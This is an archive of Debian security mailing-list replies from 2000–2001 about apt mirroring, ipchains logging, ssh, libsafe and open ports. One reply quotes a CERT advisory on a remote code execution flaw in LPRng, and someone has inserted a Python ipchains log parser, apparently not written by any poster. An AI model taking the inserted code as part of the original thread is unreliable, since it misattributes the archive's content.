Re: mirroring security.debian.org?

2001-01-26 Thread Ron Rademaker

I guess you could make a crontab running 'apt-get update' and 'apt-get -d
-y upgrade', running that in times you have some bandwidth will get all
the updates, but won't install them. You can now use ftp or something to
get the packages to the other machines (or make your
/var/cache/apt/archives apt-get-able for your local network).
The downside of this approach would be that you won't get any security
updates of packages not installed on the machine with the crontab. 

|---|
|Ron Rademaker  |
|---|
|GPG info:  |
|pub  1024D/DAB68799 2000-10-01 Ron Rademaker [EMAIL PROTECTED]  |
|Key fingerprint = F3D6 C4DC 6BE3 A37D B29D  D93B AC0B B72D DAB6 8799   |
|   |
|Key available from: wwwkeys.nl.pgp.net, wwwkeys.eu.pgp.net or  |
|wwwkeys.us.pgp.net |
|---|
|Powered by Debian/GNU Linux 2.2 (potato) (2.2.18 kernel)   |
|---|


On Fri, 26 Jan 2001, Berend De Schouwer wrote:

 On Fri, 26 Jan 2001 17:10:51 Giacomo Mulas wrote:
 | On Fri, 26 Jan 2001, Berend De Schouwer wrote:
 | 
 |  I am in a similar situation.  I would also like to have a local
 |  mirror, so that the multiple Debian machines do not need to go
 |  over the internet line.  Some do not even have internet access,
 |  but would be able to access a local mirror.
 | 
 | You would probably be better off installing a proxy server (such as
 | squid) on a computer connected to internet and then configuring apt-get
 | to use such a proxy.
 
 That is done, and it does help to some degree.  But the machines that
 can't access the internet can't go through the proxy server either.
 That is by design, and will not change.
 
 | Bye
 | Giacomo
 | 
 | _
 | 
 | Giacomo Mulas [EMAIL PROTECTED], [EMAIL PROTECTED]
 | _
 | 
 | OSSERVATORIO  ASTRONOMICO
 | Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)
 | 
 | Tel.: +39 070 71180 216 Fax : +39 070 71180 222
 | _
 | 
 | "When the storms are raging around you, stay right where you are"
 |  (Freddy Mercury)
 | _
 | 
 | 
 | 
 Kind regards,   
 Berend  
 
 -- 
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Berend De Schouwer, +27-11-712-1435, UCS
 
 

Re: lprng

2001-01-10 Thread Ron Rademaker

I know there's a debian package of lprng, but I don't know if the patch
you're talking about is applied to this package, I guess you should check
the changelog to find out.

Ron Rademaker

On Wed, 10 Jan 2001, V. Achiaga wrote:

 
 
 Does anyone know where can I find a debian-specific patch for the
 lprng package?
 
 Thanks in advance.
 
 Why? Just read the following...
 
  Subject: CERT Advisory CA-2000-22
  
  
  -BEGIN PGP SIGNED MESSAGE-
  
  CERT Advisory CA-2000-22 Input Validation Problems in LPRng
  
 Original release date: December 12, 2000
 Last updated: --
 Source: CERT/CC
  
 A complete revision history is at the end of this file.
  
  Systems Affected
  
   * Systems running unpatched LPRng software
  
  Overview
  
 A popular replacement software package to the BSD lpd printing service
 called LPRng contains at least one software defect, known as a "format
 string vulnerability,"[1] which may allow remote users to execute
 arbitrary code on vulnerable systems.
  
  I. Description
  
 LPRng, now being packaged in several open-source operating system
 distributions, has a missing format string argument in at least two
 calls to the syslog() function.
  
 Missing format strings in function calls allow user-supplied arguments
 to be passed to a susceptible *snprintf() function call. Remote users
 with access to the printer port (port 515/tcp) may be able to pass
 format-string parameters that can overwrite arbitrary addresses in the
 printing service's address space. Such overwriting can cause
 segmentation violations leading to denial of printing services or to
 the execution of arbitrary code injected through other means into the
 memory segments of the printer service.
  
 Sample syslog entries from successful exploitation of this
 vulnerability have been reported, as follows:
  
  Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
  
 This vulnerability has been assigned the identifier CAN-2000-0917 by
 the Common Vulnerabilities and Exposures (CVE) group:
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
  
 The CERT/CC has received reports of extensive probing to port 515/tcp.
 In addition, we have received some reports of systems compromised
 using this vulnerability. Tools exploiting this vulnerability have
 been posted to public forums.
  
  II. Impact
  
 A remote user may be able to execute arbitrary code with elevated
 privileges.
  
 In addition, the printing service may be disrupted or disabled
 entirely.
  
  III. Solution
  
  Apply a patch from your vendor
  
 Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
 the vendor sections below. Alternately, you can obtain the version of
 LPRng which fixes the missing format string at:
  
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
  
  Disallow access to printer service ports (typically 515/tcp) using firewall
  or packet-filtering technologies
  
 Blocking access to the vulnerable service will limit your exposure to
 attacks from outside your network perimeter. However, the
 vulnerability would still allow local users to gain privileges they
 normally shouldn't have; in addition, blocking port 515/tcp at a
 network perimeter would still allow any remote user inside the
 perimeter to exploit the vulnerability.
  
  Appendix A. Vendor Information
  
  Apple
  
 Apple has conducted an inv


Re: Speaking of broadcasts, is this a security threat?

2000-08-09 Thread Ron Rademaker

Well, you are already telling it to 'shut up' by denying it. If you don't
want the denies to show up in your logs, you'll just have to put off the
logging option in ipchains.

Ron Rademaker

On Tue, 8 Aug 2000, Micah Anderson wrote:

 
 Every few minutes I see the following show up in my log:
 
 Aug  8 00:03:17 riseup kernel: Packet log: input DENY eth0 PROTO=17
 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=638 F=0x4000 T=1 (#4)   
 Aug  8 00:49:40 riseup kernel: Packet log: input DENY eth0 PROTO=17   
 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=639 F=0x4000 T=1 (#4)
 Aug  8 00:03:17 riseup kernel: Packet log: input DENY eth0 PROTO=17
 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=638 F=0x4000 T=1 (#4)
 Aug  8 00:49:40 riseup kernel: Packet log: input DENY eth0 PROTO=17
 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=639 F=0x4000 T=1 (#4)
 
 Now if I interpret this correctly this means that my internal network
 interface is broadcasting protocol 1999 (which is like a kerberos thing? I
 don't know, I don't have kerberos installed, enabled or anything on my
 system) - but it seems to be blasting it out and I am trying to deny
 it. Is this actually something on my end that I need to tell to shut up, or
 is someone doing this to me? Either one, how can I make it stop??
 
 Thanks!
 Micah
 
 




Re: Logging atempts

2000-07-17 Thread Ron Rademaker



On Mon, 17 Jul 2000, Toth Attila wrote:

 Some comments on the topic:
 
 On Mon, 17 Jul 2000, Florian Friesdorf wrote:
  On Mon, Jul 17, 2000 at 01:41:46AM +0200, A. Vije wrote:
   On Sun, 16 Jul 2000, Patrick Barr wrote:
   
What I want to do, is run a programme that will monitor my ppp0 
connection for any attempts from anyone to connect to a port and FAIL. 
I am running 2.4.0 test2 (but I will soon move back to 2.2.16 when 
potato comes out) and I don't have netfilter on, I just have hosts.deny 
set to all:all.
   
   You can just cat (or tail -f for realtime stats) your syslog (tail -f
   /var/log/syslog) for as far as I know all attempts get logged there.
  
  afaik you need the iplogger package installed,
  including tcplogd and icmplogd, doing exactly what their names sound like.
 
 As far as I know: if you are running a packet filter, and that is the
 reason why a connection attempt fails, then this event won't reach tcplog,
 but still appears in syslog (if your filter is configured in this way).
 
  for 2.2.x kernels 'ipchains -I input 1 -i ppp0 -l -y -p tcp' 
  will log all incoming tcp connection attempts through ppp0.
  -- 'man ipchains', for further details
 
 If you are using your ppp hard, this rule will produce a lot of logged 
 data. It is more reasonable to set the packet filter to log the tcp
 connections, which are REJECTed or DENYed by it. This will probably make
 less logged data. Am I right?
 
   Small note Potato ships with 2.2.17pre6. (i`m looking forward to it .. :)
 
 Will potato really ship with a pre-kernel? In this case why don't
 patch-2.4.0-test4? (I know, that this mailing list is not dedicated for
 questions like this)

Not a 2.4.0 because that's a major kernel upgrade, with new functions,
where potato is now frozen, so there can't be major upgrades whatsoever
anymore.

Ron Rademaker

 
 
 Happy logging,
 Dw.
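
The ipchains "Packet log:" entries quoted in the broadcast thread above, and the ones produced by the -l rules discussed in this thread, share one fixed layout. As an added example (not part of any poster's message), this Python code parses that layout, where PROTO= is the IP protocol number (17 is UDP, 6 is TCP) and the number after each colon is a port, and tallies denied packets per source; the sample lines, the host name gw and all addresses are constructed.

```python
import re
from collections import Counter

# IP protocol numbers as they appear after PROTO= (common ones only).
PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}

# Layout: chain, rule target, interface, protocol, src:port, dst:port, then
# L=total length, S=TOS, I=IP id, F=fragment flags/offset, T=TTL,
# optional O= IP options, optional SYN marker, (#n) = number of the rule hit.
ENTRY_RE = re.compile(
    r"Packet log: (?P<chain>\S+) (?P<target>\S+) (?P<iface>\S+) "
    r"PROTO=(?P<proto>\d+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"L=(?P<length>\d+) S=0x(?P<tos>[0-9A-Fa-f]+) I=(?P<ipid>\d+) "
    r"F=0x(?P<frag>[0-9A-Fa-f]+) T=(?P<ttl>\d+)"
    r"(?: O=0x[0-9A-Fa-f]+)*(?P<syn> SYN)?(?: \(#(?P<rule>\d+)\))?"
)

# Constructed sample: two wrapped UDP broadcast entries (continuation lines
# start with '+', as in the mail above), one denied and one accepted TCP SYN.
SAMPLE = """\
Aug  8 00:03:17 gw kernel: Packet log: input DENY eth0 PROTO=17
+192.0.2.10:1999 255.255.255.255:1999 L=94 S=0x00 I=638 F=0x4000 T=1 (#4)
Aug  8 00:49:40 gw kernel: Packet log: input DENY eth0 PROTO=17
+192.0.2.10:1999 255.255.255.255:1999 L=94 S=0x00 I=639 F=0x4000 T=1 (#4)
Aug  8 01:02:03 gw kernel: Packet log: input DENY ppp0 PROTO=6 198.51.100.7:40112 203.0.113.5:23 L=60 S=0x00 I=5121 F=0x4000 T=52 SYN (#2)
Aug  8 01:02:09 gw kernel: Packet log: input ACCEPT ppp0 PROTO=6 198.51.100.7:40113 203.0.113.5:22 L=60 S=0x00 I=5122 F=0x4000 T=52 SYN (#1)
"""


def unwrap(text):
    """Rejoin entries that were wrapped with a leading '+' continuation."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("+") and entries:
            entries[-1] += " " + line[1:].strip()
        else:
            entries.append(line)
    return entries


def parse(entry):
    """Return the decoded fields of one log entry, or None if it is not one."""
    m = ENTRY_RE.search(entry)
    if m is None:
        return None
    f = m.groupdict()
    proto = int(f["proto"])
    return {
        "chain": f["chain"],
        "target": f["target"],
        "iface": f["iface"],
        "proto": PROTO_NAMES.get(proto, str(proto)),
        "src": f["src"],
        "sport": int(f["sport"]),
        "dst": f["dst"],
        "dport": int(f["dport"]),
        "ttl": int(f["ttl"]),
        "syn": f["syn"] is not None,  # TCP connection attempt (what -y matches)
        "rule": int(f["rule"]) if f["rule"] else None,
        "broadcast": f["dst"] == "255.255.255.255",
    }


def summarize(text):
    """Count DENY/REJECT entries per (protocol, source address, dest port)."""
    counts = Counter()
    for entry in unwrap(text):
        fields = parse(entry)
        if fields and fields["target"] in ("DENY", "REJECT"):
            counts[(fields["proto"], fields["src"], fields["dport"])] += 1
    return counts


if __name__ == "__main__":
    for (proto, src, dport), n in summarize(SAMPLE).most_common():
        print(f"{n:3d}  {proto:<4} from {src} to port {dport}")
```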
 
 

Re: using password aging with ssh

2000-07-04 Thread Ron Rademaker

Gotten this from the release critical bugreport (last one):

Package: ssh (non-US/main)
Maintainer: Philip Hands [EMAIL PROTECTED]
[HELP] Need fix. (RB)
  51747  ssh: can't handle expired passwords
  64424  ssh:   ssh believes that xauth lives in /usr/openwin/bin
[STRATEGY] Needs to be recompiled for powerpc?
  66335  ssh: Segfault at fresh install


I guess this'll tell you enough...

Ron Rademaker


On Tue, 4 Jul 2000, thomas lakofski wrote:

 Hi,
 
 Is the above possible?  That is, when a user's password has expired, they
 should be prompted to change it somehow.  Works with telnet but that seems
 to defeat the point entirely.
 
 The behaviour as is, is that sshd just gives access denied when the
 password has aged, even if the second (expiration) period has not yet
 passed.
 
 regards,
 
 Thomas
 
 
   who's watching your watchmen?
 gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=p.nu/d
 2B72 53DB 8104 2041 BDB4  F053 4AE5 01DF 81FD 4B43
 
 
 



Re: Libsafe

2000-06-19 Thread Ron Rademaker
On Mon, 19 Jun 2000, Petr Cech wrote:

 On Fri, Jun 16, 2000 at 01:30:29PM +0200 , Ron Rademaker wrote:
  libc 2.0.x versions are in slink, in potato this is upgraded to 2.1.x
  versions, so you won't be able to use libsafe with slink because the libc6
  version is too early. The newer libc6 versions won't be uploaded to slink,
 
 libsafe doesn't work with glibc 2.0?

I didn't try..

Ron

 
  you'll have to upgrade to potato (or create a slink system with a lot
  of potato, but that might cause problems, I never tried) to use libsafe.
 
 but if it does, then you can try to recompile it on your slink box.
 
   Petr Cech
 -- 
 Debian GNU/Linux maintainer - www.debian.{org,cz}
[EMAIL PROTECTED]
 
 Myth the UNIX trademark has changed hands so much no one is quite sure who 
 really owns it anymore
 
 
 



Re: Libsafe

2000-06-16 Thread Ron Rademaker
I've packaged libsafe_1.3-1_i386.deb earlier this week, I don't know if
you downloaded that version? If you got it from rademaker.dhs.org, you got
that version... As long as you are using an ldso version that is higher
than the one it depends on, it shouldn't be a problem, I would advise you
to install ld.so.preload-manager, if you want libsafe to be loaded
automatically on boot. It is used during installation, but you can also
make the library being loaded automatically manually (see docs). I
haven't tried it on slink, only potato and woody, but I guess it'll work
as long as the dependencies are correct...

Ron

On Fri, 16 Jun 2000, Richard wrote:

 Dear All
 
 I've been able to find and download libsafe_1.3-1_i386.deb
 
 Before I install it does anyone know of any issues with libsafe and
 Debian 2.1 ??  Will it just install without problems or do I need to
 alter a few config files ??
 
 Thank you
 
 -- 
 Richard
 
 Sheffield Linux
 User's Group
 
 http://www.sheflug.co.uk
 
 
 



Re: Libsafe

2000-06-16 Thread Ron Rademaker
libc 2.0.x versions are in slink, in potato this is upgraded to 2.1.x
versions, so you won't be able to use libsafe with slink because the libc6
version is too early. The newer libc6 versions won't be uploaded to slink,
you'll have to upgrade to potato (or create a slink system with a lot
of potato, but that might cause problems, I never tried) to use libsafe.

Ron



On Fri, 16 Jun 2000, Richard wrote:

 Ron
 
 Ron Rademaker wrote:
  
  I've packaged libsafe_1.3-1_i386.deb earlier this week, I don't know if
  you downloaded that version? 
 
 Yes, tried to install it and the --install script came back with...
 
 dpkg: dependency problems prevent configuration of libsafe: Libsafe
 depends on libc6 (=2.12); however: version of libc6 on system is
 2.0.7
 
 I've looked round the internet for the updated libc6 and it's not
 there.  Looks like I'll have to wait until it's uploaded to an ftp
 site.
 
 Well, at least you get sensible answers with Debian :-)
 
 Thanks
 
 -- 
 Richard
 Sheffield UK
 
 http://www.sheflug.co.uk
 
 
 



Unknown open ports

2000-06-05 Thread Ron Rademaker
I've just run a portscan to my computer that is connected to the internet
(permanently) and there were a few ports open of which I don't know what
they are for (all ports under 1024) and neither did the portscanner, these
are the ports: 686 698 708
If I use telnet to go to one of those ports, the connection isn't closed
by the remote host (only after I've typed a few things and pressed enter a
few times).

Anybody got any ideas on what these ports are for?

Ron Rademaker



Re: Unknown open ports

2000-06-05 Thread Ron Rademaker
Well, all processes do claim to be rpc, why did you think that could not
be it (I AM neo.rademaker.dhs.org).

Ron 

PS. Thanks anyway (to all), I'll go closing ports ASAP.

On Mon, 5 Jun 2000, Greg Olszewski wrote:

 On Tue, Jun 06, 2000 at 12:22:33AM +0200, Ron Rademaker wrote:
  I've just run a portscan to my computer that is connected to the internet
  (permanently) and there were a few ports open of which I don't know what
  they are for (all ports under 1024) and neither did the portscanner, these
  are the ports: 686 698 708
  If I use telnet to go to one of those ports, the connection isn't closed
  by the remote host (only after I've typed a few things and pressed enter a
  few times).
  
  Anybody got any ideas on what these ports are for?
 
 
 Not off the top of my head. The most convenient way I've found to
 determine is lsof (apt-get install lsof-2.2 or lsof-2.0.36 depending on
 kernel). 
 
 Just do a lsof | grep TCP as root and you'll get a list with names
 pids, and open ports down the right. It's nice.
 
 Someone else suggested it was rpc, but if you are actually 
 neo.rademaker.dhs.org (That's what your headers say), that's not it.
 
 
 Oh well. 
 
 hope this helps
 
 greg
 
 